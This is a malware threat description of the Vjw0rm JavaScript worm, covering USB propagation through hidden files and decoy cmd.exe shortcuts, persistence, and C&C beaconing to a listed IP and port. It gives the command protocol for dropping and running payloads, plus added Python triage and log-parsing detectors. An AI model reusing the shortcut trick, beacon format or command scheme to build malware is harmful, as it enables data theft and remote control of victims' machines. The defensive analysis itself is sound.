Worm:JS/Vjw0rm

Classification

Category :

Malware

Type :

Worm

Aliases :

Worm:JS/Vjw0rm, Vjw0rm, Vw0rm

Summary

Vjw0rm is a worm that infects accessible removable storage devices, such as USB flash drives. It can also execute instructions it receives from a command and control (C&C) server, and it maintains persistence on the infected machine.

Removal

Based on the settings of your F-Secure security product, it will either move the file to the quarantine where it cannot spread or cause harm, or remove it.

A False Positive is when a file is incorrectly detected as harmful, usually because its code or behavior resembles known harmful programs. A False Positive will usually be fixed in a subsequent database update without any action needed on your part. If you wish, you may also:

  • Check for the latest database updates

    First check if your F-Secure security program is using the latest updates, then try scanning the file again.

  • Submit a sample

    After checking, if you still believe the file is incorrectly detected, you can submit a sample of it for re-analysis.

    Note: If the file was moved to quarantine, you need to collect the file from quarantine before you can submit it.

  • Exclude a file from further scanning

    If you are certain that the file is safe and want to continue using it, you can exclude it from further scanning by the F-Secure security product.

    Note: You need administrative rights to change the settings.

Technical Details

The Vjw0rm worm is a malicious JavaScript file that spreads by creating copies of itself on accessible removable storage devices.

While active, the worm sends a network request to its C&C server every 7 seconds, providing information about the infected machine and awaiting additional instructions from its operator(s). If it receives instructions, the worm can execute them on the infected machine.

Arrival

This worm can arrive on a computer in several ways:

  1. From an infected removable storage device
  2. Via drive-by download
  3. Downloaded or dropped onto the computer by other malware

Propagation

Once it is present on a computer, the worm spreads copies of its malicious file by infecting removable storage devices that are inserted and accessible. It does so by performing the following set of actions every 7 seconds:

  1. Identify removable storage devices that are inserted and accessible, using the FileSystemObject Drive properties IsReady and DriveType (DriveType 1 = Removable).
  2. Copy the vjw0rm script file into the device's root directory:
    1. Set the script file's attributes as hidden and system
  3. Enumerate all folders and files within the root directory:
    1. Set their attributes to hidden and system (file attributes constant: 0x06 (0x04 + 0x02))
    2. Create a shortcut for each folder/file:
      1. Set the shortcut's icon:
        1. Files: Search for the default icon from registry based on the extension
        2. Folder: Default folder icon from registry
      2. Set the shortcut's target path:
        1. Files: "cmd.exe /c start <dropped_vjw0rm_ScriptName> &start <original_files_path> &exit"
        2. Folder: "cmd.exe /c start <dropped_vjw0rm_ScriptName> &start explorer <original_folders_path> &exit"
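
The propagation steps above leave a recognisable pattern on an infected drive: every original item has hidden+system set and sits next to a same-named .lnk whose target is a cmd.exe command line that launches the dropped script before the real item. The following Python triage, an added example and not F-Secure's or the worm's own code, takes a listing of a drive root (names, attribute bits and, for shortcuts, the target string as a .lnk parser would report it) and pairs each decoy shortcut with the hidden item it covers, then infers the worm's own copy as the hidden script every decoy launches. The listing is constructed and the dropped script's name "update.js" is a hypothetical choice; the page does not give the worm's file name.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Attribute bits as used by Scripting.FileSystemObject / Win32; the worm ORs
# the first two together, which is the 0x06 constant mentioned above.
ATTR_HIDDEN = 0x02
ATTR_SYSTEM = 0x04
ATTR_DIRECTORY = 0x10   # only used to build the constructed listing below
ATTR_ARCHIVE = 0x20

# Target command line of a decoy shortcut, as described in the propagation steps:
#   cmd.exe /c start <script> &start <file> &exit             (file decoy)
#   cmd.exe /c start <script> &start explorer <folder> &exit  (folder decoy)
DECOY_TARGET = re.compile(
    r"^cmd\.exe\s+/c\s+start\s+(?P<script>\S+)\s*&\s*start\s+"
    r"(?:(?P<explorer>explorer)\s+)?(?P<orig>.+?)\s*&\s*exit\s*$",
    re.IGNORECASE,
)

@dataclass
class Entry:
    """One item in the root of a removable drive; lnk_target is None unless
    the item is a shortcut (target string as a .lnk parser would report it)."""
    name: str
    attributes: int
    lnk_target: Optional[str] = None

@dataclass
class Finding:
    shortcut: str        # decoy .lnk name
    dropped_script: str  # script the decoy launches first
    original_path: str   # the real (now hidden) file or folder
    is_folder: bool

def triage_removable_root(entries: List[Entry]) -> Tuple[List[Finding], List[str]]:
    """Return (decoy findings, names carrying hidden+system) for a drive root."""
    both = ATTR_HIDDEN | ATTR_SYSTEM
    hidden = [e.name for e in entries if (e.attributes & both) == both]
    findings = []
    for e in entries:
        if e.lnk_target is None:
            continue
        m = DECOY_TARGET.match(e.lnk_target)
        if m:
            findings.append(Finding(e.name, m.group("script"), m.group("orig"),
                                    m.group("explorer") is not None))
    return findings, hidden

def dropped_scripts(findings: List[Finding], hidden: List[str]) -> List[str]:
    """Scripts that the decoys launch and that are themselves hidden+system:
    the worm's own copy in the drive root (step 2 above)."""
    launched = {f.dropped_script for f in findings}
    return sorted(s for s in launched if s in hidden)

# Constructed listing of an infected drive root. "update.js" is a hypothetical
# name for the dropped worm copy; the worm's real file name is not on this page.
SAMPLE_ROOT = [
    Entry("Report.docx", ATTR_HIDDEN | ATTR_SYSTEM | ATTR_ARCHIVE),
    Entry("Photos", ATTR_HIDDEN | ATTR_SYSTEM | ATTR_DIRECTORY),
    Entry("update.js", ATTR_HIDDEN | ATTR_SYSTEM | ATTR_ARCHIVE),
    Entry("Report.docx.lnk", ATTR_ARCHIVE,
          "cmd.exe /c start update.js &start Report.docx &exit"),
    Entry("Photos.lnk", ATTR_ARCHIVE,
          "cmd.exe /c start update.js &start explorer Photos &exit"),
    Entry("README.txt", ATTR_ARCHIVE),                              # untouched file
    Entry("Notes.lnk", ATTR_ARCHIVE, "C:\\Windows\\notepad.exe"),  # benign shortcut
]

if __name__ == "__main__":
    found, hidden_names = triage_removable_root(SAMPLE_ROOT)
    for f in found:
        kind = "folder" if f.is_folder else "file"
        print(f"{f.shortcut}: decoy for {kind} {f.original_path!r}, launches {f.dropped_script}")
    print("worm copy:", dropped_scripts(found, hidden_names))
```

The attribute test is written as `(attributes & 0x06) == 0x06` rather than "any of hidden or system", because legitimate system files on a removable drive (for example System Volume Information) can carry one of the bits; the worm's decoy pattern sets both on every item and leaves a matching .lnk beside it, so the pair of signals is what to alert on.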

Persistence

In addition to propagating itself, the worm can remain persistent on the infected machine in several ways:

  1. It creates a scheduled task (named 'Skype') that executes the worm's script every 30 minutes
  2. It copies itself to the Startup folder, so that the worm is started each time the machine is booted up
  3. It adds itself to the startup (Run) key in the registry

Network activity

Vjw0rm contacts a remote C&C server to provide its operator(s) with information about the infected machine, as well as to retrieve any additional instructions they may issue.

Request

Every 7 seconds, the worm sends a POST request with a custom User-Agent to its C&C server. This allows the worm's operator(s) to identify which infected machines are online (and so are available to receive commands), as well as providing some basic information about the machines.

The request can be defined as:

POST [host]:[port]/Vre
User-Agent: [tag]\[logicaldiskserialnum]\[computername]\[username]\[osnamever]\[avdisplayname]\\[vbc_exist]\[prev_infected]\

Where the variables are:

  • host & port: Pre-defined C&C IP address & port
  • tag: Can be defined both pre- and post-infection. It can be set post-infection through the rename functionality on the C&C server. This is useful for tagging and tracking infected computers
  • logicaldiskserialnum: The logical disk's volume serial number
  • computername & username: Taken from environment variables
  • osnamever: The operating system name and version (e.g. Microsoft Windows 7 Enterprise)
  • avdisplayname: The display name of any running anti-virus product, queried via WMI (works both pre- and post-Vista by checking both 'winmgmts:\\localhost\root\securitycenter' and '...\securitycenter2')
  • vbc_exist: Whether the .NET Visual Basic Compiler (VBC) v2.0.50727 is present
  • prev_infected: The value of the registry key "HKCU\vjw0rm". This indicates whether the machine was previously infected through the worm module, i.e. the script was executed from the root directory of an infected removable storage device

An example of the POST request:

POST 94[.]237[.]68[.]129[:]2828/Vre
User-Agent: HookKernel_A8D34214\MYCOMPUTER\Joe\Microsoft Windows 7 Professional\undefined\\YES\FALSE\

In this example no anti-virus display name was returned, so the avdisplayname field contains the string "undefined" (what JScript produces when an unset variable is converted to a string).
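
The beacon format above is simple enough to decode from proxy or web-server logs. The following Python is an added example, not part of F-Secure's description or the worm's code: it parses the User-Agent as laid out in the example (backslash-delimited, tag and volume serial in one underscore-joined first field, an empty field before vbc_exist, trailing backslash), runs that check over a few constructed log lines, and flags hosts that POST to /Vre with a matching User-Agent at the 7-second cadence. The log line layout, the source hosts, the timestamps and the two non-matching requests are assumptions; the User-Agent and C&C address on the matching lines are the ones from the example above.

```python
import re
from collections import defaultdict
from datetime import datetime

# User-Agent layout, following the example request above: backslash-delimited
# fields, tag and volume serial joined by an underscore in the first field, an
# empty field before vbc_exist, and a trailing backslash.
BEACON_UA = re.compile(
    r"^(?P<bot_id>[^\\]+)\\(?P<computer>[^\\]*)\\(?P<user>[^\\]*)\\(?P<os>[^\\]*)\\"
    r"(?P<av>[^\\]*)\\\\(?P<vbc>[^\\]*)\\(?P<prev_infected>[^\\]*)\\$"
)

# Constructed proxy-log layout (an assumption, not any product's format):
#   <iso-timestamp> <src> <dst> <method> <path> "<user-agent>"
LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) "(.*)"$')

def parse_beacon(method, path, user_agent):
    """Decode a Vjw0rm check-in; returns the field dict, or None if the request
    does not match both the /Vre path and the User-Agent layout."""
    if method.upper() != "POST" or not path.endswith("/Vre"):
        return None
    m = BEACON_UA.match(user_agent)
    if m is None:
        return None
    f = m.groupdict()
    # JScript turns an unset variable into the string "undefined" on string
    # conversion, so that is what appears when the WMI query found no
    # anti-virus product (interpretation of the example above).
    f["av_detected"] = f["av"] not in ("", "undefined")
    f["vbc"] = f["vbc"].upper() == "YES"
    f["prev_infected"] = f["prev_infected"].upper() == "TRUE"
    return f

def find_beacons(log_lines):
    """Group check-ins by source host: {src: [(timestamp, dst, fields), ...]}."""
    hits = defaultdict(list)
    for line in log_lines:
        m = LOG_LINE.match(line)
        if m is None:
            continue
        ts, src, dst, method, path, ua = m.groups()
        fields = parse_beacon(method, path, ua)
        if fields is not None:
            hits[src].append((datetime.fromisoformat(ts), dst, fields))
    return dict(hits)

def is_periodic(timestamps, period_s=7.0, tolerance_s=1.0, min_count=3):
    """True when consecutive check-ins are period_s apart within tolerance_s,
    i.e. the 7-second cadence described above."""
    if len(timestamps) < min_count:
        return False
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    return all(abs(g - period_s) <= tolerance_s for g in gaps)

def infected_hosts(log_lines):
    """Sources whose check-ins both decode and recur at the 7-second cadence."""
    return sorted(src for src, hits in find_beacons(log_lines).items()
                  if is_periodic([h[0] for h in hits]))

# Constructed log lines. The User-Agent and destination on the 10.0.0.5 lines
# are the example from the page; hosts, times and the other requests are made up.
SAMPLE_LOG = [
    r'2021-03-02T10:00:00 10.0.0.5 94.237.68.129:2828 POST /Vre "HookKernel_A8D34214\MYCOMPUTER\Joe\Microsoft Windows 7 Professional\undefined\\YES\FALSE\"',
    r'2021-03-02T10:00:03 10.0.0.9 203.0.113.10:80 GET /index.html "Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/85.0"',
    r'2021-03-02T10:00:07 10.0.0.5 94.237.68.129:2828 POST /Vre "HookKernel_A8D34214\MYCOMPUTER\Joe\Microsoft Windows 7 Professional\undefined\\YES\FALSE\"',
    r'2021-03-02T10:00:09 10.0.0.7 94.237.68.129:2828 POST /Vre "curl/7.68.0"',
    r'2021-03-02T10:00:14 10.0.0.5 94.237.68.129:2828 POST /Vre "HookKernel_A8D34214\MYCOMPUTER\Joe\Microsoft Windows 7 Professional\undefined\\YES\FALSE\"',
]

if __name__ == "__main__":
    for src, hits in find_beacons(SAMPLE_LOG).items():
        f = hits[0][2]
        print(f"{src} -> {hits[0][1]}: id={f['bot_id']} user={f['user']}@{f['computer']} "
              f"os={f['os']!r} av={f['av_detected']} periodic={is_periodic([h[0] for h in hits])}")
    print("infected:", infected_hosts(SAMPLE_LOG))
```

Requiring both the /Vre path and the field layout keeps a lone POST to /Vre (the curl line) from firing, and the cadence check separates a live infection from a single replayed or sandboxed request; the decoded prev_infected and av fields are what an analyst would pull out first, since they say whether the host picked the worm up from a USB drive and whether the C&C operator believes it is unprotected.
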

Response

The worm's operator(s) can send a response to the infected machine's POST request that contains commands for the machine to execute. The response can be defined as:

[command][SPL][arg1][SPL][arg2]

Where the variables are:

  • SPL: Delimiter (The default is |V| on both the original C&C executable and the script)
  • command: Remotely issued instructions to be executed
  • arg1 (optional): A payload, usually a script
  • arg2 (optional): Usually a filename

An example of a response that gives instructions to drop and execute an additional script would be:

Sc|V|somescript|V|randomstring.ext

Where Sc is the command for executing an additional malicious module/script, somescript is the actual payload, randomstring is a randomly generated filename, and ext is the extension selected by the operator on the C&C server.

Executing remotely-issued commands

Vjw0rm is also able to execute 5 distinct commands, any of which it can receive from the C&C server as a response to a POST request. The commands are:

  1. Cl: Kill the script
  2. Sc/RF: Drop and execute an additional malicious script
    1. arg1: script payload
    2. arg2: filename
  3. Ex: Execute an additional payload
    1. arg1: payload downloader script
  4. Up: Update to and execute a new version of the script
    1. arg1: new script
    2. arg2: filename
  5. Un: Uninstall the worm module by removing it from startup (both the registry entry and the Startup folder), removing the infection identifier (HKCU\vjw0rm), deleting the script file, and quitting
    1. arg1: uninstall script from C&C

Analysis on file: d6636b527c02e882fc8d64eda18b4aafde8afec2
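
The response format (command, |V| delimiter, up to two arguments) and the command table above are enough to write a decoder that an analyst can point at captured C&C traffic or at a sandbox's fake C&C without ever executing what comes back. The following Python is an added example, not F-Secure's or the worm's code: it splits a response into its named arguments, classifies the command, and writes any carried script to a quarantine directory under a neutral .txt name, stripping path components from the operator-chosen filename. The sample response, its harmless payload and the "..\" prefix on its filename are constructed; how the real script treats a delimiter that appears inside a payload is not stated on the page, so the decoder splits off at most two arguments.

```python
import pathlib
import tempfile

SPL = "|V|"   # default delimiter in both the C&C panel and the script (see above)

# Command table from the list above: command -> (action, names of the args it takes)
COMMANDS = {
    "Cl": ("kill", []),
    "Sc": ("drop_exec", ["script", "filename"]),
    "RF": ("drop_exec", ["script", "filename"]),
    "Ex": ("exec", ["downloader_script"]),
    "Up": ("update", ["script", "filename"]),
    "Un": ("uninstall", ["uninstall_script"]),
}

def decode_response(body, spl=SPL):
    """Split a C&C response into command and named args without executing it.
    The page does not say how the script treats a delimiter inside a payload,
    so at most two args are split off and any remainder stays in the last one.
    Unknown commands come back with action None so the caller can flag them."""
    parts = body.split(spl, 2)
    command, args = parts[0].strip(), parts[1:]
    action, names = COMMANDS.get(command, (None, []))
    decoded = {"command": command, "action": action, "args": dict(zip(names, args))}
    if len(args) > len(names):
        decoded["extra_args"] = args[len(names):]
    return decoded

def payload_of(decoded):
    """The script carried by a response, whichever arg slot it arrived in."""
    for key in ("script", "downloader_script", "uninstall_script"):
        if key in decoded["args"]:
            return decoded["args"][key]
    return None

def quarantine_payload(decoded, out_dir):
    """Write the carried script to out_dir for analysis and return its path.
    The operator-chosen filename is reduced to a Windows basename (no drive or
    directory components) and given a .txt suffix so nothing opens it by
    file-type association. Returns None for responses that carry no script."""
    script = payload_of(decoded)
    if script is None:
        return None
    chosen = decoded["args"].get("filename", decoded["command"])
    base = pathlib.PureWindowsPath(chosen).name or decoded["command"]
    path = pathlib.Path(out_dir) / (base + ".txt")
    path.write_text(script, encoding="utf-8")
    return path

# Constructed response in the Sc form shown above; the payload is a harmless
# one-liner and the filename deliberately carries "..\" to show it is stripped.
SAMPLE_RESPONSE = 'Sc|V|WScript.Echo("constructed sample payload")|V|..\\a1b2c3.js'

def demo():
    """Decode SAMPLE_RESPONSE and quarantine it in a temporary directory;
    returns (action, written file name, file contents)."""
    decoded = decode_response(SAMPLE_RESPONSE)
    with tempfile.TemporaryDirectory() as tmp:
        path = quarantine_payload(decoded, tmp)
        return decoded["action"], path.name, path.read_text(encoding="utf-8")

if __name__ == "__main__":
    for body in (SAMPLE_RESPONSE, "Cl", "Ex|V|(downloader script)", "Zz|V|x"):
        d = decode_response(body)
        print(d["command"], "->", d["action"], d["args"], d.get("extra_args", []))
    print(demo())
```

Keeping the decode step separate from anything that touches disk mirrors how the worm itself is structured (parse, then act on the command) and makes it easy to log every command the operator issued to a victim, including ones the script would not understand, which is often the first sign that a panel has been updated ahead of the implant.
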